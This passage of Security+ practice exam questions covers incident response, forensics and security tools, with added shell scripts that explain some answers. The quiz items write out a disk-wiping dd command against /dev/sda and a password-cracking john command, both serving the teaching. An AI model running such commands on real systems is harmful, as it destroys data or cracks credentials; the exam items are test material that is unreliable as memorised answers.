A. Contact the certificate authority and request that they revoke the certificate.

B. Add the certificate to the CRL.

C. Remove the certificate from the list of whitelisted certificates from each machine that trusts it.

D. Reissue the certificate, causing the old version to be invalidated.

224. Which of the following is not a common way to validate control over a domain for a domain-validated X.509 certificate?

A. Changing the DNS TXT record

B. Responding to an email sent to a contact in the domain's WHOIS information

C. Publishing a nonce provided by the certificate authority as part of the domain information

D. Changing the IP addresses associated with the domain

225. Fiona knows that SNMPv3 provides additional security features that previous versions of SNMP did not. Which of the following is not a security feature provided by SNMPv3?

A. SQL injection prevention

B. Message integrity

C. Message authentication

D. Message confidentiality

226. The following figure shows a proxy in use. In this usage model, the proxy receives a connection request, and then connects to the server and forwards the original request. What type of proxy is this?

A. A reverse proxy

B. A round-robin proxy

C. A next-generation proxy

D. A forward proxy

Chapter 4
Operations and Incident Response

THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:

4.1 Given a scenario, use the appropriate tool to assess organizational security

4.2 Summarize the importance of policies, processes, and procedures for incident response

4.3 Given an incident, utilize appropriate data sources to support an investigation

4.4 Given an incident, apply mitigation techniques or controls to secure an environment

4.5 Explain the key aspects of digital forensics

1. Mila wants to generate a unique digital fingerprint for a file, and needs to choose between a checksum and a hash. Which option should she choose and why should she choose it?

A. A hash, because it is unique to the file

B. A checksum, because it verifies the contents of the file

C. A hash, because it can be reversed to validate the file

D. A checksum, because it is less prone to collisions than a hash

2. Which of the following would prevent a user from installing a program on a company-owned mobile device?

A. An allow list

B. A deny list

C. ACL

D. HIDS
3. Liam is responsible for monitoring security events in his company. He wants to see how diverse events may connect using his security information and event management (SIEM). He is interested in identifying different indicators of compromise that may point to the same breach. Which of the following would be most helpful for him to implement?

A. NIDS

B. PKI

C. A correlation dashboard

D. A trend dashboard

4. Emily wants to capture HTTPS packets using tcpdump. If the service is running on its default port and her Ethernet adapter is eth0, which tcpdump command should she use?

A. tcpdump eth0 -proto https

B. tcpdump -i eth0 -proto https

C. tcpdump tcp https eth0

D. tcpdump -i eth0 tcp port 443

5. Mila gives her team a scenario, and then asks them questions about how they would respond, what issues they expect they might encounter, and how they would handle those issues. What type of exercise has she conducted?

A. A tabletop exercise

B. A walk-through

C. A simulation

D. A drill

6. Murali is preparing to acquire data from various devices and systems that are targets in a forensic investigation. Which of the following devices is the least volatile according to the order of volatility?

A. Backups

B. CPU cache

C. Local disk

D. RAM
7. Henry has been asked for vulnerability scan results by an incident responder. He is curious to know why the responder needs scan results. What answer would you provide to him to explain why scan results are needed and are useful?

A. The scans will show the programs the attackers used.

B. The scans will show the versions of software installed before the attack.

C. Vulnerable services will provide clues about what the attackers may have targeted.

D. The scans will show where firewalls and other network devices were in place to help with incident analysis.

8. What phase of the incident response process should be placed at point A in the following image?

A. Simulations

B. Review

C. Recovery

D. Patching

9. Nick is reviewing commands run on a Windows 10 system and discovers that the route command was run with the -p flag. What occurred?

A. Routes were discovered using a ping command.

B. The route's path will be displayed.

C. A route was added that will persist between boots.

D. A route was added that will use the path listed in the command.

10. Lucca wants to acquire open source intelligence information using an automated tool that can leverage search engines and tools like Shodan. Which of the following tools should he select?

A. curl

B. hping

C. netcat

D. theHarvester

11. Brent wants to use a tool to help him analyze malware and attacks and wants to cover a broad range of tactics and tools that are used by adversaries. Which of the following is broadly implemented in technical tools and covers techniques and tactics without requiring a specific order of operations?

A. The Diamond Model of Intrusion Analysis

B. The Cyber Kill Chain

C. The MITRE ATT&CK framework

D. The CVSS standard

12. Ted needs to preserve a server for forensic purposes. Which of the following should he not do?

A. Turn the system off to ensure that data does not change.

B. Remove the drive while the system is running to ensure that data does not change.

C. Leave the machine connected to the network so that users can continue to use it.

D. All of the above

13. What mitigation technique is used to limit the ability of an attack to continue while keeping systems and services online?

A. Segmentation

B. Isolation

C. Nuking

D. Containment

14. Jessica wants to review the network traffic that her Windows system has sent to determine if a file containing sensitive data was uploaded from the system. What Windows log file can she use to find this information?

A. The application log

B. The network log

C. The security log

D. None of the above

15. What term is used to describe the documentation trail for control, analysis, transfer, and final disposition of evidence for digital forensic work?

A. Evidence log

B. Paper trail

C. Chain of custody

D. Digital footprint

16. Henry wants to determine what services are on a network that he is assessing. Which of the following tools will provide him with a list of services, ports, and their status?

A. nmap

B. route

C. hping

D. netstat

17. Nathan needs to know how many times an event occurred and wants to check a log file for that event. Which of the following grep commands will tell him how many times the event happened if each occurrence is logged independently in the logfile.txt log file, and uses a unique event ID: event101?

A. grep logfile.txt -n 'event101'

B. grep -c 'event101' logfile.txt

C. grep logfile.txt -c 'event101'

D. grep -c event101 -i logfile.txt

18. Jacob wants to ensure that all of the areas that are impacted by an incident are addressed by his incident response team. What term is used to describe the relationship and communications process that teams use to ensure that all of those involved are treated appropriately?

A. COOP

B. Stakeholder management

C. PAM

D. Communications planning

19. While Susan is conducting a forensic review of logs from two servers hosted in the same data center, she notices that log items on the first server occurred exactly an hour before matching events on the second server. What is the most likely cause of such exact occurrences?

A. The attack took an hour to complete, providing the attacker with access to the second machine an hour later.

B. The log entries are incorrect, causing the events to appear at the wrong time.

C. The attacker used a script causing events to happen exactly an hour apart.

D. A time offset is causing the events to appear to occur at different times.

20. What is the primary usage of Domain Name System (DNS) data in incident investigations and operational security monitoring?

A. DNS data is used to capture network scans.

B. DNS data can be used to identify domain transfer attacks.

C. DNS log information can be used to identify malware going to known malicious sites.

D. DNS log information can be used to identify unauthorized logins.

21. Dani generates an OpenSSL certificate using the following command. What has she set with -newkey rsa:2048?

openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out mycert.crt

A. The year that the certificate will expire

B. The key length in bytes

C. The year that the root certificate will expire

D. The key length in bits

22. Theresa wants to view the last 10 lines of a log file and to see it change as modifications are made. What command should she run on the Linux system she is logged into?

A. head -f -end 10 logfile.log

B. tail -f logfile.log

C. foot -watch -l 10 logfile.log

D. follow -tail 10 logfile.log

23. Henry wants to acquire the firmware from a running system. What is the most likely technique that he will need to use to acquire the firmware?

A. Connect using a serial cable.

B. Acquire the firmware from memory using memory forensics tools.

C. Acquire the firmware from disk using disk forensic tools.

D. None of the above

24. Eric wants to determine how much bandwidth was used during a compromise and where the traffic was directed to. What technology can he implement before the event to help him see this detail and allow him to have an effective bandwidth monitoring solution?

A. A firewall

B. NetFlow

C. Packet flow

D. A DLP

25. Naomi has acquired an image of a drive as part of a forensic process. She wants to ensure that the drive image matches the original. What should she create and record to validate this?

A. A third image to compare to the original and new image

B. A directory listing to show that the directories match

C. A photographic image of the two drives to show that they match

D. A hash of the drives to show that their hashes match

26. Ryan has been asked to run Nessus on his network. What type of tool has he been asked to run?

A. A fuzzer

B. A vulnerability scanner

C. A WAF

D. A protocol analyzer

27. Jason wants to ensure that the digital evidence he is collecting during his forensic investigation is admissible. Which of the following is a common requirement for admissibility of evidence?

A. It must be relevant.

B. It must be hearsay.

C. It must be timely.

D. It must be public.

28. Which of the following key elements is not typically included in the design of a communication plan?

A. Incident severity

B. Customer impact

C. Employee impact

D. Cost to the organization

29. Rick runs the following command:

cat file1.txt file2.txt

What will occur?

A. The contents of file1.txt will be appended to file2.txt.

B. The contents of file1.txt will be displayed, and then the contents of file2.txt will be displayed.

C. The contents of file2.txt will be appended to file1.txt.

D. The contents of both files will be combined line by line.

30. Michelle wants to check for authentication failures on a CentOS Linux-based system. Where should she look for these event logs?

A. /var/log/auth.log

B. /var/log/fail

C. /var/log/events

D. /var/log/secure

31. A web page's title is considered what type of information about the page?

A. Summary

B. Metadata

C. Header data

D. Hidden data

32. Nelson has discovered malware on one of the systems he is responsible for and wants to test it in a safe environment. Which of the following tools is best suited to that testing?

A. strings

B. scanless

C. Cuckoo

D. Sn1per

33. Lucca wants to view metadata for a file so that he can determine the author of the file. What tool should he use from the following list?

A. Autopsy

B. strings

C. exiftool

D. grep

34. Isaac wants to acquire an image of a system that includes the operating system. What tool can he use on a Windows system that can also capture live memory?

A. dd

B. FTK Imager

C. Autopsy

D. WinDump

35. Jason is conducting a forensic investigation and has retrieved artifacts in addition to drives and files. What should he do to document the artifacts he has acquired?

A. Image them using dd and ensure that a valid MD5 sum is generated.

B. Take a picture of them, label them, and add them to the chain of custody documentation.

C. Contact law enforcement to properly handle the artifacts.

D. Engage legal counsel to advise him how to handle artifacts in an investigation.

36. Gary wants to check for the mail servers for example.com. What tool and command can he use to determine this?

A. nslookup -query=mx example.com

B. ping -email example.com

C. smtp -mx example.com

D. email-lookup -mx example.com

37. Which of the following is best suited to analyzing live SIP traffic?

A. Log files

B. Wireshark

C. Nessus

D. SIPper
38. Andrea wants to identify services on a remote machine and wants the services to be labeled with service names and other common details. Which of the following tools will not provide that information?

A. netcat

B. Sn1per

C. Nessus

D. nmap

39. Joseph is writing a forensic report and wants to be sure he includes appropriate detail. Which of the following would not typically be included while discussing analysis of a system?

A. Validation of the system clock's time settings

B. The operating system in use

C. The methods used to create the image

D. A picture of the person from whom the system was taken

40. Greg believes an attacker has been using a brute-force password attack against a Linux system he is responsible for. What command could he use to determine if this is the case?

A. grep "Failed password" /var/log/auth.log

B. tail /etc/bruteforce.log

C. head /etc/bruteforce.log

D. grep "Failed login" /etc/log/auth.log
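
Questions 17 and 40 both come down to counting matching lines in a log file. The following is an added example, not part of the book: it writes a handful of constructed sshd lines in the format auth.log uses on Debian-style systems (/var/log/secure on CentOS), counts failures with grep -c as in question 17, and then goes one step past question 40 by ranking the source addresses with awk, so a single host hammering one account stands out from an ordinary mistyped password. The log lines, host name and addresses (TEST-NET ranges) are made up for the example.

```sh
#!/bin/sh
# Added example: count and attribute failed SSH logins from constructed log lines.

# Constructed sample log: four failures from one host, one from another, one success.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Mar  1 10:00:01 host1 sshd[2210]: Failed password for invalid user admin from 203.0.113.5 port 50211 ssh2
Mar  1 10:00:02 host1 sshd[2210]: Failed password for invalid user admin from 203.0.113.5 port 50212 ssh2
Mar  1 10:00:03 host1 sshd[2211]: Failed password for root from 203.0.113.5 port 50213 ssh2
Mar  1 10:00:04 host1 sshd[2211]: Failed password for root from 203.0.113.5 port 50214 ssh2
Mar  1 10:01:17 host1 sshd[2230]: Failed password for greg from 198.51.100.7 port 41002 ssh2
Mar  1 10:01:25 host1 sshd[2231]: Accepted password for greg from 198.51.100.7 port 41003 ssh2
EOF

# Question 17 style: -c prints the number of matching lines (one event per line).
count_failed() {
    grep -c "Failed password" "$1"
}

# Rank source IPs by failure count; prints "count ip" lines, busiest first.
failed_by_source() {
    grep "Failed password" "$1" \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $1, $2 }'
}

# Print every source at or above a threshold (default 3) as a likely brute-force attempt.
brute_force_sources() {
    threshold=${2:-3}
    failed_by_source "$1" | awk -v t="$threshold" '$1 >= t { print $2 }'
}

count_failed "$SAMPLE_LOG"
failed_by_source "$SAMPLE_LOG"
brute_force_sources "$SAMPLE_LOG"
```

On a real system the first argument would be /var/log/auth.log or /var/log/secure; the threshold is a starting point, not a rule, since a user who fat-fingers a password twice will also show up in the ranking.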

41. Elaine wants to determine what websites a user has recently visited using the contents of a forensically acquired hard drive. Which of the following locations would not be useful for her investigation?

A. The browser cache

B. The browser history

C. The browser's bookmarks

D. Session data

42. Jason wants to acquire network forensic data. What tool should he use to gather this information?

A. nmap

B. Nessus

C. Wireshark

D. SNMP

43. Ananth has been told that attackers sometimes use ping to map networks. What information returned by ping could be most effectively used to determine network topology?

A. TTL

B. Packets sent

C. Packets received

D. Transit time

44. Susan has discovered evidence of a compromise that occurred approximately five months ago. She wants to conduct an incident investigation but is concerned about whether the data will exist. What policy guides how long logs and other data are kept in most organizations?

A. The organization's data classification policy

B. The organization's backup policy

C. The organization's retention policy

D. The organization's legal hold policy

45. Selah executes the following command on a system. What has she accomplished?

dd if=/dev/zero of=/dev/sda bs=4096

A. Copying the disk /dev/zero to the disk /dev/sda

B. Formatting /dev/sda

C. Writing zeroes to all of /dev/sda

D. Cloning /dev/sda1

46. Jim is preparing a presentation about his organization's incident response process and wants to explain why communications with involved groups and individuals across the organization are important. Which of the following is the primary reason that organizations communicate with and involve staff from affected areas throughout the organization in incident response efforts?

A. Legal compliance

B. Retention policies

C. Stakeholder management

D. A COOP

47. Elle is conducting an exercise for her organization and wants to run an exercise that is as close to an actual event as possible. What type of event should she run to help her organization get this type of real-world practice?

A. A simulation

B. A tabletop exercise

C. A walk-through

D. A wargame

48. Erin wants to determine what devices are on a network but cannot use a port scanner or vulnerability scanner. Which of the following techniques will provide the most data about the systems that are active on the network?

A. Run Wireshark in promiscuous mode.

B. Query DNS for all A records in the domain.

C. Review the CAM tables for all the switches in the network.

D. Run netstat on a local workstation.

49. What SIEM component collects data and sends it to the SIEM for analysis?

A. An alert level

B. A trend analyzer

C. A sensor

D. A sensitivity threshold

50. Alaina sets her antimalware solution to move infected files to a safe storage location without removing them from the system. What type of setting has she enabled?

A. Purge

B. Deep-freeze

C. Quarantine

D. Retention

51. A senior vice president in the organization that Chuck works in recently lost a phone that contained sensitive business plans and information about suppliers, designs, and other important materials. After interviewing the vice president, Chuck finds out that the phone did not have a passcode set and was not encrypted, and that it could not be remotely wiped. What type of control should Chuck recommend for his company to help prevent future issues like this?

A. Use containment techniques on the impacted phones.

B. Deploy a DLP system.

C. Deploy an MDM system.

D. Isolate the impacted phones.

52. The school that Gabby works for wants to prevent students from browsing websites that are not related to schoolwork. What type of solution is best suited to help prevent this?

A. A content filter

B. A DLP

C. A firewall

D. An IDS

53. Frank knows that forensic information he is interested in is stored on a system's hard drive. If he wants to follow the order of volatility, which of the following items should be forensically captured after the hard drive?

A. Caches and registers

B. Backups

C. Virtual memory

D. RAM

54. Greg runs the following command. What occurs?

chmod -R 755 /home/greg/files

A. All of the files in /home/greg/ are set to allow the group to read, write, and execute them, and Greg and the world can only read them.

B. The read, write, and execute permissions will be removed from all files in the /home/greg/files directory.

C. All of the files in /home/greg/files are set to allow Greg to read, write, and execute them, and the group and the world can only read them.

D. A new directory will be created with read, write, and execute permissions for the world and read-only permissions for Greg and the group he is in.
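
Questions 220 and 54 both turn on reading an octal mode, and the quickest way to stop second-guessing 700 versus 755 is to decode the digits and then check what the kernel actually recorded. The following is an added example, not part of the book: a shell function that turns an octal mode into the rwx string that ls -l shows, plus two functions that create throwaway files under mktemp, run the same chmod commands the questions use, and read the resulting modes back with stat. The file and directory names are constructed for the example, and stat -c is the GNU coreutils form, which is an assumption about the system.

```sh
#!/bin/sh
# Added example: decode an octal mode and verify what chmod actually set.

# perm_string 700 -> rwx------ ; perm_string 755 -> rwxr-xr-x
# Only the last three digits (owner, group, other) are decoded.
perm_string() {
    mode=${1#"${1%???}"}
    out=""
    for digit in $(printf '%s' "$mode" | sed 's/./& /g'); do
        # each octal digit is read(4) + write(2) + execute(1)
        [ $((digit & 4)) -ne 0 ] && out="${out}r" || out="${out}-"
        [ $((digit & 2)) -ne 0 ] && out="${out}w" || out="${out}-"
        [ $((digit & 1)) -ne 0 ] && out="${out}x" || out="${out}-"
    done
    printf '%s\n' "$out"
}

# Question 220: chmod 700 on a single file, then read the mode back.
# Output: "<octal mode> <rwx string>"
demo_chmod_700() {
    f=$(mktemp)
    chmod 700 "$f"
    mode=$(stat -c '%a' "$f")
    rm -f "$f"
    printf '%s %s\n' "$mode" "$(perm_string "$mode")"
}

# Question 54: chmod -R 755 on a directory tree; -R applies to the directory
# and everything below it. Output: "<dir mode> <file mode>"
demo_chmod_recursive() {
    base=$(mktemp -d)
    mkdir "$base/files"
    printf 'constructed sample\n' > "$base/files/a.txt"
    chmod 700 "$base/files"            # start from owner-only on both
    chmod 600 "$base/files/a.txt"
    chmod -R 755 "$base/files"         # the command from question 54
    dirmode=$(stat -c '%a' "$base/files")
    filemode=$(stat -c '%a' "$base/files/a.txt")
    rm -rf "$base"
    printf '%s %s\n' "$dirmode" "$filemode"
}

perm_string 700
perm_string 755
demo_chmod_700
demo_chmod_recursive
```

Note what 755 decodes to: group and world get read and execute, not read alone, which is why 755 is the usual mode for directories and scripts and 644 for plain data files.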

55. Charles wants to ensure that the forensic work that he is doing cannot be repudiated. How can he validate his attestations and documentation to ensure nonrepudiation?

A. Encrypt all forensic output.

B. Digitally sign the records.

C. Create an MD5 checksum of all images.

D. All of the above

56. Diana wants to capture the contents of physical memory using a command-line tool on a Linux system. Which of the following tools can accomplish this task?

A. ramdump

B. system-dump

C. memcpy

D. memdump

57. Valerie wants to capture the pagefile from a Windows system. Where can she find the file for acquisition?

A. C:\Windows\swap

B. C:\pagefile.sys

C. C:\Windows\users\swap.sys

D. C:\swap\pagefile.sys

58. Megan needs to conduct a forensic investigation of a virtual machine (VM) hosted in a VMware environment as part of an incident response effort. What is the best way for her to collect the VM?

A. As a snapshot using the VMware built-in tools

B. By using dd to an external drive

C. By using dd to an internal drive

D. By using a forensic imaging device after removing the server's drives

59. What forensic concept is key to establishing provenance for a forensic artifact?

A. Right to audit

B. Preservation

C. Chain of custody

D. Timelines

60. What role do digital forensics most often play in counterintelligence efforts?

A. They are used to determine what information was stolen by spies.

B. They are used to analyze tools and techniques used by intelligence agencies.

C. They are required for training purposes for intelligence agents.

D. They do not play a role in counterintelligence.

61. Which of the following groups is not typically part of an incident response team?

A. Law enforcement

B. Security analysts

C. Management

D. Communications staff

62. Bob needs to block Secure Shell (SSH) traffic between two security zones. Which of the following Linux iptables firewall rules will block that traffic from the 10.0.10.0/24 network to the system the rule is running on?

A. iptables -A INPUT -p tcp --dport 22 -i eth0 -s 10.0.10.0/24 -j DROP

B. iptables -D OUTPUT -p udp -dport 21 -i eth0 -s 10.0.10.255 -j DROP

C. iptables -A OUTPUT -p udp --dport 22 -i eth0 -s 10.0.10.255 -j BLOCK

D. iptables -D INPUT -p udp --dport 21 -I eth0 -s 10.0.10.0/24 -j DROP

63. Maria wants to add entries into the Linux system log so that they will be sent to her security information and event management (SIEM) device when specific scripted events occur. What Linux tool can she use to do this?

A. cat

B. slogd

C. logger

D. tail

64. Amanda's organization does not currently have an incident response plan. Which of the following reasons is not one she should present to management in support of creating one?

A. It will prevent incidents from occurring.

B. It will help responders react appropriately under stress.

C. It will prepare the organization for incidents.

D. It may be required for legal or compliance reasons.

65. Which of the following scenarios is least likely to result in data recovery being possible?

A. A file is deleted from a disk.

B. A file is overwritten by a smaller file.

C. A hard drive is quick-formatted.

D. A disk is degaussed.

66. Henry records a video of the removal of a drive from a system as he is preparing for a forensic investigation. What is the most likely reason for Henry to record the video?

A. To meet the order of volatility

B. To establish guilt beyond a reasonable doubt

C. To ensure data preservation

D. To document the chain of custody and provenance of the drive

67. Adam wants to use a tool to edit the contents of a drive. Which of the following tools is best suited to that purpose?

A. Autopsy

B. WinHex

C. dd

D. FTK Imager

68. Jill wants to build a checklist that includes all the steps to respond to a specific incident. What type of artifact should she create to do so in her security orchestration, automation, and response (SOAR) environment?

A. A BC plan

B. A playbook

C. A DR plan

D. A runbook

69. Alaina wants to use a password cracker against hashed passwords. Which of the following items is most important for her to know before she does this?

A. The length of the passwords

B. The last date the passwords were changed

C. The hashing method used for the passwords

D. The encryption method used for the passwords

70. Vincent wants to ensure that his staff does not install a popular game on the workstations they are issued. What type of control could he deploy as part of his endpoint security solution that would most effectively stop this?

A. An application approved list

B. A DLP

C. A content filter

D. An application block list

71. Charlene wants to set up a tool that can allow her to see all the systems a given IP address connects to and how much data is sent to that IP by port and protocol. Which of the following tools is not suited to meet that need?

A. IPFIX

B. IPSec

C. sFlow

D. NetFlow

72. A system that Sam is responsible for crashed, and Sam suspects malware may have caused an issue that led to the crash. Which of the following files is most likely to contain information if the malware was a file-less, memory-resident malware package?

A. The swap file

B. The Windows system log

C. A dump file

D. The Windows security log

73. Which of the following commands can be used to show the route to a remote system on a Windows 10 workstation?

A. traceroute

B. arp

C. tracert

D. netstat

74. Tools like PRTG and Cacti that monitor SNMP information are used to provide what type of information for an incident investigation?

A. Authentication logs

B. Bandwidth monitoring

C. System log information

D. Email metadata

75. Which of the following is not a key consideration when considering on-premises versus cloud forensic investigations?

A. Data breach notification laws

B. Right-to-audit clauses

C. Regulatory requirements

D. Provenance

76. The company Charles works for has recently had a stolen company cell phone result in a data breach. Charles wants to prevent future incidents of a similar nature. Which of the following mitigation techniques would be the most effective?

A. Enable FDE via MDM.

B. A firewall change

C. A DLP rule

D. A new URL filter rule

77. Henry runs the following command:

dig @8.8.8.8 example.com

What will it do?

A. Search example.com's DNS server for the host 8.8.8.8.

B. Search 8.8.8.8's DNS information for example.com.

C. Look up the hostname for 8.8.8.8.

D. Perform open source intelligence gathering about 8.8.8.8 and example.com.

78. Greg is collecting a forensic image of a drive using FTK Imager, and he wants to ensure that he has a valid copy. What should he do next?

A. Run the Linux cmp command to compare the two files.

B. Calculate an AES-256 hash of the two drives.

C. Compare an MD5 or SHA-1 hash of the drive to the image.

D. Compare the MD5 of each file on the drive to the MD5 of each file in the image.
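
Questions 1, 25 and 78 rest on the same point: the image is valid when a cryptographic hash of it equals a hash of the source, and a simple checksum is not a substitute because unrelated inputs collide easily. The following is an added example, not part of the book: it builds a small constructed "source" file, copies it with dd the way an imaging step would (the same if=/of=/bs= syntax as question 45, written to a file rather than a disk), and compares SHA-256 digests; it then shows two files whose bytes add up to the same additive checksum yet hash differently. sha256sum from GNU coreutils is assumed, with shasum as a fallback, and the file contents are made up for the example.

```sh
#!/bin/sh
# Added example: verify an image against its source with a hash, and show why an
# additive checksum is not a fingerprint.

# SHA-256 digest of a file, using whichever tool the system has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# Naive additive checksum: the sum of every byte value. Byte order is invisible to it.
byte_sum() {
    od -An -v -tu1 "$1" | awk '{ for (i = 1; i <= NF; i++) s += $i } END { print s + 0 }'
}

# Image $1 to $2 with dd, then report MATCH or MISMATCH from the two SHA-256 values.
image_and_verify() {
    dd if="$1" of="$2" bs=4096 2>/dev/null
    if [ "$(sha256_of "$1")" = "$(sha256_of "$2")" ]; then
        echo MATCH
    else
        echo MISMATCH
    fi
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed "evidence drive" contents.
printf 'constructed evidence: customer export 2021-03-01\n' > "$WORK/source.bin"

# Two files with the same bytes in a different order: same byte_sum, different hash.
printf 'ab' > "$WORK/x.bin"
printf 'ba' > "$WORK/y.bin"

image_and_verify "$WORK/source.bin" "$WORK/image.dd"
printf 'x.bin sum=%s sha256=%s\n' "$(byte_sum "$WORK/x.bin")" "$(sha256_of "$WORK/x.bin")"
printf 'y.bin sum=%s sha256=%s\n' "$(byte_sum "$WORK/y.bin")" "$(sha256_of "$WORK/y.bin")"
```

Record both digests in the case notes at acquisition time; a later hash of the image that still matches is what shows the evidence was not altered in handling. MD5 and SHA-1 are what the question names and what many imaging tools still emit, but SHA-256 costs nothing extra and avoids arguments about known collisions.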

79. Adam needs to search for a string in a large text file. Which of the following tools should he use to most efficiently find every occurrence of the text he is searching for?

A. cat

B. grep

C. head

D. tail

80. Angela wants to use segmentation as part of her mitigation techniques. Which of the following best describes a segmentation approach to network security?

A. Removing potentially infected or compromised systems from the network

B. Using firewalls and other tools to limit the spread of an active infection

C. Partitioning the network into segments based on user and system roles and security requirements

D. Adding security systems or devices to prevent data loss and exposure

81. Charlene has been asked to write a business continuity (BC) plan for her organization. Which of the following will a business continuity plan best handle?

A. How to respond during a person-made disaster

B. How to keep the organization running during a system outage

C. How to respond during a natural disaster

D. All of the above

82. Brad wants to create a self-signed X.509 certificate. Which of the following tools can be used to perform this task?

A. hping

B. Apache

C. OpenSSL

D. scp
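
Questions 21 and 82 are both about OpenSSL. The following is an added example, not part of the book: it runs the same req -x509 command from question 21 with a -subj argument so it needs no interactive input, uses openssl x509 to read back the key size and to check the validity window that -days set, and uses openssl verify to show that a self-signed certificate is trusted only when it is itself supplied as the CA. The subject name is made up for the example, and an installed openssl binary is assumed.

```sh
#!/bin/sh
# Added example: create a self-signed certificate and read back what the flags set.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Same flags as question 21; -subj replaces the interactive prompts (CN is constructed).
make_self_signed() {
    openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 \
        -keyout "$WORK/privateKey.key" -out "$WORK/mycert.crt" \
        -subj "/CN=forensics.example.test" 2>/dev/null
}

# -newkey rsa:2048 sets the RSA modulus size in bits; read it back from the cert.
key_bits() {
    openssl x509 -in "$WORK/mycert.crt" -noout -text \
      | sed -n 's/.*Public-Key: (\([0-9]*\) bit).*/\1/p'
}

# -days 365 sets the validity window. -checkend N exits 0 if the cert is still
# valid N seconds from now, so asking about 364 days answers "no" and 366 "yes".
expires_within_days() {
    if openssl x509 -in "$WORK/mycert.crt" -noout -checkend $(( $1 * 86400 )) >/dev/null 2>&1; then
        echo no
    else
        echo yes
    fi
}

# A self-signed certificate verifies only against itself as the CA file...
verify_self_signed() {
    if openssl verify -CAfile "$WORK/mycert.crt" "$WORK/mycert.crt" >/dev/null 2>&1; then
        echo trusted
    else
        echo untrusted
    fi
}

# ...and fails when no trust anchor is supplied, because nothing else issued it.
verify_without_anchor() {
    if openssl verify -no-CAfile -no-CApath "$WORK/mycert.crt" >/dev/null 2>&1; then
        echo trusted
    else
        echo untrusted
    fi
}

make_self_signed
key_bits
expires_within_days 364
expires_within_days 366
verify_self_signed
verify_without_anchor
```

The last two functions are the practical side of question 223: because no CA issued the certificate, there is no CRL to consult, and trust (or revocation) is entirely a matter of which machines carry the certificate in their own trust store.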

83. Cameron wants to test for commonly used passwords in his organization. Which of the following commands would be most useful if he knows that his organization's name, mascot, and similar terms are often used as passwords?

A. john --wordlist "mywords.txt" --passwordfile.txt

B. ssh-test -"mascotname, orgname"

C. john -show passwordfile.txt

D. crack-passwords -wordlist "mascotname, orgname"

84. Which of the following capabilities is not built into Autopsy?

A. Disk imaging

B. Timeline generation

C. Automatic image filtering

D. Communication visualization

85. Alaina's company is considering signing a contract with a cloud service provider, and wants to determine how secure their services are. Which of the following is a method she is likely to be able to use to assess it?

A. Ask for permission to vulnerability scan the vendor's production service.

B. Conduct an audit of the organization.

C. Review an existing SOC audit.

D. Hire a third party to audit the organization.

86. Erin is working through the Cyber Kill Chain and has completed the exploitation phase as part of a penetration test. What step would come next?

A. Lateral movement

B. Privilege escalation

C. Obfuscation

D. Exfiltration
87. Dana wants to use an exploitation framework to perform a realistic penetration test of her organization. Which of the following tools would fit that requirement?

A. Cuckoo

B. theHarvester

C. Nessus

D. Metasploit

88. Cynthia has been asked to build a playbook for the SOAR system that her organization uses. What will she build?

A. A set of rules with actions that will be performed when an event occurs using data collected or provided to the SOAR system

B. An automated incident response process that will be run to support the incident response (IR) team

C. A trend analysis-driven script that will provide instructions to the IR team

D. A set of actions that the team will perform to use the SOAR to respond to an incident

89. What incident response step is missing in the following image?

A. Business continuity

B. Containment

C. Response

D. Discovery

90. Gurvinder's corporate data center is located in an area that FEMA has identified as being part of a 100-year floodplain. He knows that there is a chance in any given year that his data center could be completely flooded and underwater, and he wants to ensure that his organization knows what to do if that happens. What type of plan should he write?

A. A Continuity of Operations Plan

B. A business continuity plan

C. A flood insurance plan

D. A disaster recovery plan

91. Frank wants to identify where network latency is occurring between his computer and a remote server. Which of the following tools is best suited to identifying both the route used and which systems are responding in a timely manner?

A. ping

B. tracert

C. pathping

D. netcat

92. Derek wants to see what DNS information can be queried for his organization as well as what hostnames and subdomains may exist. Which of the following tools can provide both DNS query information and Google search information about hosts and domains through a single tool?

A. dnsenum

B. dig

C. host

D. dnscat

93. Jill has been asked to perform data recovery due to her forensic skills. What should she tell the person asking to perform data recovery to give her the best chance of restoring lost files that were accidentally deleted?

A. Immediately reboot using the reset switch to create a lost file memory dump.

B. Turn off “secure delete” so that the files can be more easily recovered.

C. Do not save any files or make any changes to the system.

D. All of the above

94. What phase follows lateral movement in the Cyber Kill Chain?

A. Exfiltration

B. Exploitation

C. Anti-forensics

D. Privilege escalation

95. Veronica has completed the recovery phase of her organization's incident response plan. What phase should she move into next?

A. Preparation

B. Lessons learned

C. Recovery

D. Documentation

96. Michelle has been asked to sanitize a number of drives to ensure that sensitive data is not exposed when systems are removed from service. Which of the following is not a valid means of sanitizing hard drives?

A. Physical destruction

B. Degaussing

C. Quick-formatting the drives

D. Zero-wiping the drives

97. Bart is investigating an incident, and needs to identify the creator of a Microsoft Office document. Where would he find that type of information?

A. In the filename

B. In the Microsoft Office log files

C. In the Windows application log

D. In the file metadata

98. Nathaniel wants to allow Chrome through the Windows Defender firewall. What type of firewall rule change will he need to permit this?

A. Allow TCP 80 and 443 traffic from the system to the Internet.

B. Add Chrome to the Windows Defender Firewall allowed applications.

C. Allow TCP 80 and 443 traffic from the Internet to the system.

D. All of the above

99. Nathan wants to perform whois queries on all the hosts in a class C network. Which of the following tools can do that and also be used to discover noncontiguous IP blocks in an automated fashion?

A. netcat

B. dnsenum

C. dig

D. nslookup

100. What key forensic tool relies on correctly set system clocks to work properly?

A. Disk hashing

B. Timelining

C. Forensic disk acquisition

D. File metadata analysis

101. Valerie is writing her organization's forensic playbooks and knows that the state that she operates in has a data breach notification law. Which of the following key items is most likely to be influenced by that law?

A. Whether Valerie calls the police for forensic investigation help

B. The maximum amount of time until she has to notify customers of sensitive data breaches

C. The certification types and levels that her staff have to maintain

D. The maximum number of residents that she can notify about a breach

